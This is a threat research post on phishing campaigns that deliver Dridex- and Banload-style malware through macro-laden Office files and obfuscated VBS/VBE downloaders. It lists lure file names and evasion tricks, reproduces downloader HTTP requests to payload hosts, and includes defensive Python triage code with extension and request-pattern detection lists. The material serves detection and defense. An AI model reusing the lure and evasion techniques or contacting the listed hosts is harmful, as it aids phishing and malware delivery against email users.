Threat Research
Macros Galore

The recent FBI announcement of the Dridex botnet take-down and the arrest of its administrator [1] doesn’t mean email users will see the last of Dridex; similar phishing tactics may well be reused with future malware. Dridex activity has slowed overall in recent months, following the first noticeable Dridex campaigns in early 2015. Throughout October, however, we have observed a rise in phishing documents with embedded macros used as first-stage downloaders for malware such as Banload. We shouldn’t lose sight of the successful social engineering and evasion methods used by this botnet just because it was taken down.
What Does a Macro Downloader Do?
These campaigns are multistage downloaders whose typical infiltration method is socially engineered email carrying disguised attachments. The attachments are file types that allow the execution of embedded Visual Basic (VB) code: Visual Basic script (.vbs) files, VBScript Encoded (.vbe) files, and Microsoft Office documents with embedded Visual Basic macros. When the code executes, it contacts a server to download and execute the malware payload. This method has frequently been used to install malware such as Dridex, Dyre, and Banload. Figure 1 illustrates the downloader concept.
Figure 1. The concept of the downloader
Figure 2. An example of a phishing email
The phishing emails focus on convincing the user to download and open the attachments; Figure 2 shows an example. Attachment names usually correspond to the email subject and include a randomized number at the end of the file name. Spam campaign themes often refer to picture and movie files, government documents, potentially sensitive information such as court papers, resumes, and shipment orders. Here are a few file names used in recent campaigns:
- Mirian_resume_1700.doc
- ACH_Payment_0067855YKwcod..vbs
- remit network report.pdf.vbs
- adam.champion_OK_5072.doc
- marketing.it_GO_1793.doc
- ian.marchant_QR_4940.doc
- janetcard_FE700F.xls
- 2via_Boleto_Ref-01237.vbs
- DSC283751726313.vbs
- MOV90472251.vbs
- Proposta_comercial00734133.vbs
- Rendimentos1827349154.vbs
- pendencias01726324.vbe
- comunicado01726315.vbe
- Solicitação_de_2ª_via_Boleto_pdf.vbe
- Arquivo_Comprovante_deposito0128971256.vbe
Microsoft Office documents containing macros are often password protected, while VBS/VBE files are obfuscated beyond readability, as shown in Figure 3. Both methods may allow the files to evade antivirus detection. VBS and VBE files will execute immediately upon opening, as will Office macros if the victim has macros enabled. Otherwise, the victim will receive a prompt asking if they want to run the macro.
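The naming tricks in the list above (double extensions such as report.pdf.vbs, randomised numeric suffixes, script extensions that run on open) and the macro carriers in Office files can be triaged at the mail gateway before a user ever sees the prompt. The following is an added example, not FireEye's code: it checks the attachment name, compares the extension's claim with the file's magic bytes, and looks for a VBA project inside OOXML packages and (crudely) inside legacy OLE files. The heuristics and the in-memory sample files are constructed assumptions; two of the file names are taken from the list above.

```python
"""Attachment triage for the macro/VBS downloader pattern described above.

Added example, not FireEye's code. The heuristics, thresholds and the
in-memory sample files are assumptions constructed for this post; two of
the file names are taken from the list above.
"""
import io
import re
import zipfile

# Extensions that the Windows Script Host executes as Visual Basic on open.
SCRIPT_EXTS = {".vbs", ".vbe"}
# Harmless-looking "inner" extensions used to disguise a script (report.pdf.vbs).
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt", ".zip"}
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy binary Office (.doc/.xls)
ZIP_MAGIC = b"PK\x03\x04"                        # OOXML package (.docx/.docm/.xlsx/.xlsm)
# Directory entry name of a VBA project inside an OLE file (stored as UTF-16LE).
VBA_STREAM_MARKER = "_VBA_PROJECT".encode("utf-16-le")


def name_findings(filename: str) -> list[str]:
    """Heuristics that need only the attachment name."""
    findings = []
    lower = filename.lower().strip()
    stem, dot, last = lower.rpartition(".")      # "report.pdf.vbs" -> ("report.pdf", ".", "vbs")
    if not dot:
        stem, last = lower, ""
    ext = "." + last if dot else ""
    inner = "." + stem.rpartition(".")[2] if "." in stem else ""
    if ext in SCRIPT_EXTS:
        findings.append(f"script extension {ext} executes on open")
        if inner in DECOY_EXTS:
            findings.append(f"double extension: disguised as {inner}")
    # Campaign names carry a random digit block before the extension (resume_1700).
    if re.search(r"\d{4,}$", stem):
        findings.append("randomised numeric suffix in name")
    return findings


def content_findings(filename: str, data: bytes) -> list[str]:
    """Compare the extension's claim with the bytes, and look for a VBA project."""
    findings = []
    ext = "." + filename.lower().rpartition(".")[2] if "." in filename else ""
    is_ole, is_zip = data.startswith(OLE_MAGIC), data.startswith(ZIP_MAGIC)
    if ext in {".doc", ".xls"} and not is_ole:
        findings.append(f"{ext} claimed but not an OLE compound file")
    if ext in {".docx", ".docm", ".xlsx", ".xlsm"} and not is_zip:
        findings.append(f"{ext} claimed but not an OOXML package")
    if is_ole and VBA_STREAM_MARKER in data:
        # Crude: a real parser walks the OLE directory; the marker is enough for triage.
        findings.append("legacy Office file contains a VBA project (macro)")
    if is_zip:
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                has_vba = any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())
        except zipfile.BadZipFile:
            return findings + ["zip magic present but the package does not parse"]
        if has_vba:
            findings.append("OOXML package contains a VBA project (macro)")
            if ext in {".docx", ".xlsx"}:
                findings.append("macro project inside a macro-free extension")
    return findings


def make_ooxml(with_macro: bool) -> bytes:
    """Constructed minimal OOXML-style package (not a real Word file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00" * 16)
    return buf.getvalue()


def make_ole(with_macro: bool) -> bytes:
    """Constructed stand-in for a legacy .doc: just the magic, padding and the marker."""
    body = OLE_MAGIC + b"\x00" * 64
    return body + VBA_STREAM_MARKER if with_macro else body


def triage(filename: str, data: bytes = b"") -> list[str]:
    """All findings for one attachment; an empty list means nothing suspicious."""
    findings = name_findings(filename)
    if data:
        findings += content_findings(filename, data)
    return findings


if __name__ == "__main__":
    samples = {
        "remit network report.pdf.vbs": b"",        # name from the list above
        "Mirian_resume_1700.doc": make_ole(True),   # name from the list above
        "invoice_8841.docx": make_ooxml(True),      # constructed: macro in a .docx
        "quarterly.docm": make_ooxml(False),        # constructed: clean
        "scan_0913.doc": make_ooxml(False),         # constructed: extension lies about type
    }
    for name, blob in samples.items():
        print(f"{name}: {triage(name, blob) or 'clean'}")
```

The name checks alone catch most of the list above; the content checks matter for the password-protected Office documents, where the macro is still visible as a VBA project even though the code inside it cannot be read without the password.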
Figure 3. Dridex ActiveMime
Figure 4. Obfuscated VisualBasic script (.vbs) file
HTTP Request Variation
The downloaders make HTTP GET or HTTP POST requests to retrieve the malware payload. However, as shown in Figure 4, the details of the request vary widely across samples. This makes it harder to create network-based signatures and helps the downloader avoid detection. Notice in Example 2 below that the “GET” request uses a double “EE.”
Example 1
GET /01/hits.html HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: sfgbfhysf.systemy1201.in
Example 2
GEET /bt/bt/sp_index.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; InfoPath.2)
Host: 136.243.219.233
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
Example 3
POST /download.php?i=V8XHfsL1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: pastebin.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
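Because the request details vary from sample to sample, a single byte signature is brittle; what stays constant is the shape of the request. The following added example (not FireEye's code) parses the three requests above and reports the traits a defender can key on: the malformed "GEET" method, the WinHttpRequest User-Agent of a script-driven client, a POST with an empty body, a Content-Type header on a body-less GET, a bare IP in the Host header, and a public paste site as the payload source. The three request strings are the page's own examples retyped; the checks themselves are assumptions, not a signature set.

```python
"""Network-side triage of the downloader HTTP requests shown above.

Added example, not FireEye's code. The three requests are the page's own
examples retyped as strings; the checks are assumptions about what a
defender would key on, not a signature set.
"""
import re

STANDARD_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH", "CONNECT", "TRACE"}
# Default User-Agent of the WinHTTP COM object that VB scripts commonly call.
SCRIPT_CLIENT_MARKERS = ("WinHttp.WinHttpRequest",)
# Public paste/content-hosting domains seen as payload sources (Example 3 above).
PASTE_SITES = {"pastebin.com"}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request head into method, path, version and a header map."""
    lines = raw.strip().splitlines()
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break                      # end of the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def request_findings(raw: str) -> list[str]:
    """Reasons this request looks like a script-driven payload fetch (empty if none)."""
    req = parse_request(raw)
    h, findings = req["headers"], []
    if req["method"] not in STANDARD_METHODS:
        findings.append(f"non-standard method {req['method']}")
    if any(m in h.get("user-agent", "") for m in SCRIPT_CLIENT_MARKERS):
        findings.append("User-Agent identifies a scripting HTTP client")
    if req["method"] == "POST" and h.get("content-length") == "0":
        findings.append("POST with an empty body")
    if req["method"] == "GET" and "content-type" in h:
        findings.append("Content-Type header on a body-less GET")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", h.get("host", "")):
        findings.append("Host is a bare IP address")
    if h.get("host", "").lower() in PASTE_SITES:
        findings.append("payload fetched from a public paste site")
    return findings


# Example 1 from the page, retyped.
EXAMPLE_1 = """GET /01/hits.html HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: sfgbfhysf.systemy1201.in
"""

# Example 2 from the page, retyped (note the "GEET" method).
EXAMPLE_2 = """GEET /bt/bt/sp_index.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; InfoPath.2)
Host: 136.243.219.233
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
"""

# Example 3 from the page, retyped.
EXAMPLE_3 = """POST /download.php?i=V8XHfsL1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: pastebin.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
"""

if __name__ == "__main__":
    for label, raw in (("Example 1", EXAMPLE_1), ("Example 2", EXAMPLE_2), ("Example 3", EXAMPLE_3)):
        print(f"{label}: {request_findings(raw) or 'nothing unusual'}")
```

None of these traits is conclusive on its own (a bare-IP Host or a zero-length POST occurs in legitimate traffic), which is why the function returns reasons rather than a verdict; combining them with the process that issued the request, such as wscript.exe or an Office application, is what turns them into a usable alert.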
Unique Malicious VBS/VBE Since August 2015
Even after the announcement of the Dridex botnet take-down, we are still seeing the use of Visual Basic downloaders. In Figure 5, the red area represents the number of unique hashes seen by FireEye, while the blue area represents the portion seen by open source malware repositories. The average lag time is 47 hours between when a sample was first seen by FireEye and when it was first seen in the open source repository.
Figure 5. First Seen by FireEye vs. Open Source Repository
Figure 6. Distribution of Malware Based on File Types
Malicious VBS/VBE Downloaders Seen Across Various Industries
Spam campaigns, by their nature, are broad-based and generally have no specific target. That also means they can affect any organization: Figure 7 shows that campaigns involving VBS/VBE downloaders are seen across numerous industries. Some of these industries have fortified their networks with well-known anti-virus solutions; it is dynamic and generic detection, however, that catches the first instance of a new sample.
Figure 7. Distribution of VBS/VBE downloaders across industries
How to Avoid Future Dridex-like Malware?
FireEye recommends:
- Always confirm the identity or source of the email.
- Verify that attachment file extensions reflect the actual file type.
- Modify security policies to disable the use of macros.
- Educate users to disable or implement macro security in Office applications.
- Consider a detection system that has the ability to detect multistage malware in phishing and spam campaigns, like the FireEye Email Security Solution.
[1] https://www.fbi.gov/pittsburgh/press-releases/2015/bugat-botnet-administrator-arrested-and-malware-disabled